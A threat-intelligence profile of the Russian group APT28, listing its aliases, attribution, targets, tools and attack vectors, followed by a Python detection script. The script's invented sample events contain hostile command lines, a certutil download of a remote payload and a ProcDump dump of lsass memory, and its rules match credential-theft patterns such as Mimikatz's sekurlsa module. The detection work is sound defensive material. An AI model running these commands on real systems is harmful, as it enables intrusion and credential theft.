APT28 is a threat group that has been attributed to Russia’s General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165. This group has been active since at least 2004. APT28 reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. In 2018, the US indicted five GRU Unit 26165 officers associated with APT28 for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations. Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as Sandworm Team.
Name: Sofacy (Kaspersky), APT 28 (Mandiant), Fancy Bear (CrowdStrike), Sednit (ESET), Group 74 (Talos), TG-4127 (SecureWorks), Pawn Storm (Trend Micro), Tsar Team (iSight), Strontium (Microsoft), Swallowtail (Symantec), SIG40 (NSA), Snakemackerel (iDefense), Iron Twilight (SecureWorks), ATK 5 (Thales), T-APT-12 (Tencent), ITG05 (IBM), TAG-0700 (Google), Grizzly Steppe (US Government; a joint label that also covers APT 29, Cozy Bear, The Dukes)
Location: Russia
Suspected attribution: General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165
Date of initial activity: 2004
Targets: Governments, militaries, media organizations and security-focused NGOs, with a sustained interest in Eastern European governments and security organizations (including officials of Georgia’s Ministry of Internal Affairs and Ministry of Defense, and individuals affiliated with NATO and the OSCE); US political campaigns and party organizations (the Hillary Clinton campaign, the DNC and the DCCC in 2016); the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, the French television network TV5 Monde, and other organizations.
Motivation: Information theft and espionage; stolen material has also been used in ‘active measures’ operations (for example the 2016 public release of athletes’ medical files taken from WADA).
Associated tools: Cannon, certutil, Computrace, CORESHELL, DealersChoice, Downdelph, Drovorub, Foozer, HIDEDRV, JHUHUGIT, Koadic, Komplex, LoJax, Mimikatz, Nimcy, OLDBAIT, PocoDown, ProcDump, PythocyDbg, Responder, Sedkit, Sedreco, SkinnyBoy, USBStealer, VPNFilter, Winexe, WinIDS, X-Agent, X-Tunnel, Zebrocy; the group also relies on living-off-the-land use of built-in utilities such as certutil.
Attack vectors: Spear-phishing emails carrying malicious attachments or links to a custom exploit kit; strategic web compromises that redirect visitors to the same exploit kit; targeted credential-phishing campaigns against webmail accounts; and close-access operations (cited in the 2018 US indictment alongside the remote intrusions against WADA, the OPCW and others).
How they work:
APT28 likely seeks to collect intelligence about Georgia’s security and political dynamics by targeting officials working for the Ministry of Internal Affairs and the Ministry of Defense.
APT28 has demonstrated interest in Eastern European governments and security organizations. These victims would provide the Russian government with an ability to predict policymaker intentions and gauge its ability to influence public opinion. APT28 appeared to target individuals affiliated with European security organizations and global multilateral institutions. The Russian government has long cited European security organizations like NATO and the OSCE as existential threats, particularly during periods of increased tension in Europe.
Active since at least 2009 by SecureWorks’ reckoning, the IRON TWILIGHT threat group (SecureWorks’ name for APT28) targets media, governments, militaries, and international non-governmental organizations (NGOs) that often have a security focus. It appears to focus on political and military espionage and has used obtained material in ‘active measures’ operations and to retaliate against actions that the Russian government perceives as hostile. SecureWorks Counter Threat Unit (CTU) researchers assess with high confidence that IRON TWILIGHT is operated by the GRU, Russia’s military intelligence service. IRON TWILIGHT was responsible for the April 2015 compromise of the French television network TV5 Monde, which took its broadcasts off the air. The group was responsible for the 2016 breaches of the Democratic National Committee (DNC) network and of Hillary Clinton campaign staff email accounts. In 2016, IRON TWILIGHT attacked the World Anti-Doping Agency (WADA) and publicly released medical files relating to international athletes under the alias ‘Fancy Bears Hack Team’.
The group was also responsible for the attempted cyber attacks on the Organization for the Prohibition of Chemical Weapons (OPCW). IRON TWILIGHT has used spear-phishing emails containing malicious attachments or links to a custom exploit kit (Sedkit, listed above) to compromise systems; victims are also redirected to the exploit kit via strategic web compromises. Its toolset includes malware for Windows and Linux-based operating systems (Drovorub, listed above, targets Linux) and iOS devices. The threat actors have also run targeted phishing campaigns to steal credentials for webmail accounts.
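The profile names spear-phishing attachments as the initial access vector and several dual-use or living-off-the-land tools (certutil, ProcDump, Mimikatz) in the tool list. The following Python is an added detection example, not code from this page or from any vendor cited on it: it runs a few generic behavioural rules over constructed Sysmon Event ID 1 style process-creation records. The patterns (certutil download/decode switches, ProcDump against lsass, the Mimikatz sekurlsa module, an Office application spawning a shell or script host) are well-known tool-abuse signatures rather than APT28-specific indicators, and every hostname, path and username in the sample events is invented.

```python
import re

# Constructed Sysmon Event ID 1 style records (invented hosts, paths and users, not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c certutil -urlcache -split -f http://198.51.100.7/update.bin %TEMP%\update.bin"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Users\alice\AppData\Local\Temp\procdump64.exe",
     "CommandLine": r"procdump64.exe -accepteula -ma lsass.exe C:\Users\alice\AppData\Local\Temp\l.dmp"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -verify C:\Users\alice\Downloads\vendor.cer"},  # benign certutil use
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"svchost.exe -k netsvcs"},
]

RULE_CERTUTIL = "certutil used to download or decode a payload"
RULE_PROCDUMP = "ProcDump dumping lsass memory"
RULE_MIMIKATZ = "Mimikatz sekurlsa module on the command line"
RULE_OFFICE_CHILD = "Office application spawned a shell or script host"

# Command-line patterns; case-insensitive because operators vary casing freely.
COMMAND_RULES = [
    (RULE_CERTUTIL, re.compile(r"certutil(?:\.exe)?\s.*?-(?:urlcache|decode|encode)\b", re.I)),
    (RULE_PROCDUMP, re.compile(r"procdump(?:64)?(?:\.exe)?\s.*?\blsass(?:\.exe)?\b", re.I)),
    (RULE_MIMIKATZ, re.compile(r"sekurlsa::", re.I)),
]
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS_AND_SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}


def basename(path):
    """Last component of a Windows path, lower-cased for set lookups."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the list of rule names an event triggers (empty if none)."""
    hits = [name for name, pat in COMMAND_RULES if pat.search(event["CommandLine"])]
    # Parent/child check: a document reader launching a shell is the classic
    # signature of a macro or exploit in a phishing attachment.
    if basename(event["ParentImage"]) in OFFICE_APPS and basename(event["Image"]) in SHELLS_AND_SCRIPT_HOSTS:
        hits.append(RULE_OFFICE_CHILD)
    return hits


def scan(events):
    """Return (index, hits) for every event that triggers at least one rule."""
    results = []
    for i, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS):
        print(f"event {i}: {SAMPLE_EVENTS[i]['CommandLine']}")
        for h in hits:
            print(f"    -> {h}")
```

Two design points matter in practice: certutil is a signed Windows binary with many legitimate uses, so the rule keys on the download and decode switches rather than on the binary name (the -verify invocation in the sample is deliberately left unflagged), and a ProcDump run against lsass has occasional legitimate administrative use, so that hit is a strong lead rather than a conviction and should be triaged together with the parent process and the dump file destination.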